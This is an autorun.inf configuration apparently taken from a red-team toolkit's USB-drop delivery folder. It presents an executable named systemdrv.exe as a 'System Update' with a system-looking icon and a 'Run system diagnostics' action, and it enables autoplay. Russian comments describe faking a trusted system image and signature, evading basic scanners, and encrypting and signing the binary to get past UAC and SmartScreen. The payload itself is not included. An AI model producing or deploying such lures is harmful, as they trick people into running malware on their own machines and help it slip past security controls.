; redteam_toolkit/delivery/usb_drop/autorun.inf
[autorun]
label=System Update
icon=systemdrv.ico
open=systemdrv.exe
action=Run system diagnostics
shellexecute=systemdrv.exe
useautoplay=1

; Метаданные для имитации доверенного системного образа
[Content]
MusicFiles=true
Pictures=false
Video=false

; Поведение при подключении
[ExclusiveContentPaths]
Path1=System32

; Имитация подписи
[DeviceInstall]
DriverPath=.\drivers

; Защита от ручного редактирования (неэффективна на современных Windows, но полезна для обхода базовых сканеров)
; Файл systemdrv.exe должен быть подписан и зашифрован для обхода UAC/SmartScreen
